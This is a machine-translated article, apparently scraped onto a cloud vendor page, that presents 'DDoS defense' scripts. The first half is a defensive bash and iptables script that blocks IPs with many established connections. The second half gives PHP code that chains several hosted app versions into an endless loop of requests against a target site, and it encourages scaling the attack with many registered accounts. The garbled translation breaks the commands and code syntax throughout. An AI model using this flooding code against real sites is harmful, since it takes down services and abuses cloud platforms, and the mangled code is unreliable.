Summary of server DDOS Attack Defense script

Source: Internet
Author: User

The server collects two types of script code for ddos attacks. One is the linux shell Command, and the other is the support for php code in any environment. I will post the source code below, for more information, see.

SHELL scripts for server defense against DDOS attacks


1. write scripts

Mkdir/root/bin

Vi/root/bin/dropip. sh

#! /Bin/bash

/Bin/netstat-na | grep ESTABLISHED | awk '{print $5}' | awk-F: '{print $1}' | sort | uniq-c | sort-rn | head-10 | grep-v-E '192. 168 | 127.0 '| awk' {if ($2! = Null & $1> 4) {print $2} '>/tmp/dropip

For I in $ (cat/tmp/dropip)

Do

/Sbin/iptables-a input-s $ I-j DROP

Echo "$ I kill at 'date'">/var/log/ddos

Done

2. Add execution permission

Chmod + x/root/bin/dropip. sh

3. Added to the scheduled task and executed every minute

Crontab-e

*/1 */root/bin/dropip. sh

Note:

The most important is that in the second row, the first 10 ip addresses with the maximum number of ESTABLISHED connections are obtained and written to the temporary file/tmp/dropip, excluding the internal ip segment starting with 192.168 | 127.0. use the for loop to drop all the ip addresses in the dropip through iptables, and then write them to the log file/var/log/ddos.

Another method is to use php to write ddos attacks and use other cloud platforms for operations.

Sinaapp is used as the test object.

Test method: create four versions of the app.

The homepage code of version 1 is as follows:

<Php

File_get_contents ('HTTP: // 2.mars.sinaapp.com/'); // version 1 triggers an attack (Access Version 2)

>

Version 2 homepage code:

<Php

File_get_contents ('HTTP: // www.xxx.com/ip.php'): // target

File_get_contents ('HTTP: // 3.mars.sinaapp.com/'); // Access Version 3

>

Version 3 homepage code:

<Php

For ($ I = 1; $ <= 10; $ I ++) {// here it's a bit evil, and more than a few times it's better

File_get_contents ('HTTP: // www.xxx.com/ip.php ');

File_get_contents ('HTTP: // 4.mars.sinaapp.com /');}

>

Version 4 homepage code:

<Php

File_get_contents ('HTTP: // 2.mars.sinaapp.com/'); // Access Version 2, leading to an endless loop

>

The above is an attack using a sinaapp user. You can expand it by yourself, register a large number of users, and create more versions to launch attacks. However, during the test, we found that each APP actually has two IP addresses. It is better to use multiple users.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.